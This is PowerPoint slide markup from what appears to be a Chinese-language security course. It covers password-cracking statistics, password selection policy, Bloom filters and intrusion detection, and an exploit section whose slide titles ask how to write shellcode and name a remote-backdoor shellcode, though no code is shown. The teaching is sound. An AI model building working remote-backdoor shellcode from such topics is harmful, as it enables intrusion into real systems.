          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Table 11.4    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>13797</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>个帐户的样本集中的密码破解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B343325-570E-41B8-B7D9-593B37C4DFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="6324600"/>
            <a:ext cx="2286000" cy="430213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(This table can be found on page 364 in the textbook.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736B8BCA-95B0-41D8-AC41-B296A55FEC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6457950"/>
            <a:ext cx="5867400" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>* Computed as the number of matches divided by the search size. The more words that needed to be tested for a match, the lower the cost/benefit ratio.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="244741" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AE7770-7969-4AC6-8CB1-05384F6E15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09563"/>
            <a:ext cx="5584825" cy="623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wipe dir="u"/>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40A23773-524A-4342-8258-6D4BDCE80A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="935038"/>
            <a:ext cx="9144000" cy="1284287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>口令选择策略</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B811F951-0F49-43A6-9F57-48ADA1D7FD77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261938" y="2997200"/>
            <a:ext cx="4173537" cy="2895600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>目标是消除可猜测的密码，同时允许用户选择难忘的密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>正在使用四种基本技术：</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Diagram 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C167B80B-A201-40B3-B90E-CB09BB4CEF19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3581400" y="1600200"/>
          <a:ext cx="6096000" cy="482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标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB4BA6B-B700-4E61-99FC-8BDD0F3B723A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Bloom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>过滤器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248835" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7357C799-F2BD-474E-8D32-73EA7368B6F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700"/>
              <a:t>Bloom Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700"/>
              <a:t>1970</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700"/>
              <a:t>年由布隆提出的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700"/>
              <a:t>它实际上是一个很长的二进制向量和一系列随机映射函数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700"/>
              <a:t>布隆过滤器可以用于检索一个元素是否在一个集合中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700"/>
              <a:t>优点：空间效率和查询时间都远远超过一般的算法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700"/>
              <a:t>缺点：有一定的误识别率和删除困难。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="270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8" name="内容占位符 4" descr="649px-Bloom_filter.svg.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE1D1BA-7C08-476C-B81A-1926C0A8A7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54338" y="1484313"/>
            <a:ext cx="6181725"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9859" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B4ECF41-E0C9-4682-84FF-4432192C11AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>原理说明</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249860" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FD4F4F9-EB33-4805-BEBA-5A056A8C9FCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="2870200"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>采用包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>位的位数组存储，</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>个元素集合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>S={x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" baseline="-25000"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>, x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" baseline="-25000"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>,…,x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" baseline="-25000"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>相互独立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>的哈希函数</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>映射到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>{1,…,m}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>的范围中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>插入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>S{x,y,z}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>集合中的每个元素，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>函数映射到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>{1,…,18}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>范围内，将相应的位置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>表示待查询元素</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>用相同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>函数，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>映射到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>{1,…,18}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>范围内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>如果每位都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>，则表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>在集合中，否表表示不在集合中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>在判断一个元素是否属于某个集合时，有可能会把不属于这个集合的元素误认为属于这个集合（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>false positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>假阳性，误报）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>它通过极少的错误换取了存储空间的极大节省。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="200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2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C51F5C-B7AC-4675-A063-83B4C519DA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813" y="361950"/>
            <a:ext cx="7826375"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AFFAEF-BD3A-4392-8FB7-F1AB4647CA7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="1841500"/>
            <a:ext cx="6934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入侵方法</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入侵检测概述</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入侵检测方法与基本原理</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入侵检测响应机制</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入侵检测标准化工作</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口令管理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364BDD2D-A8E4-4007-A59E-8A67C176BA14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.10 Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27651" name="Picture 2" descr="http://images.cnitblog.com/blog/405877/201308/10184650-e012f76a285a430da70e67128de2674e.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AFBE057-BC0A-4BBA-BFB2-055E9AB15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92150"/>
            <a:ext cx="701675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31D77AA2-F433-48F4-A9E2-7F62CCC9198E}"/>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DDC04F80-4AC2-46FB-AC3B-F2ECCCC4FCC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460375" y="2055813"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>两个问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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）如何写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shellcode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）如何确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>所在的地址？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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DC5ADA23-91EA-41B6-B098-D73E67BC2D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开启一个远程后门并获得命令行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3380E652-D873-47E1-B972-36110710BA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060575"/>
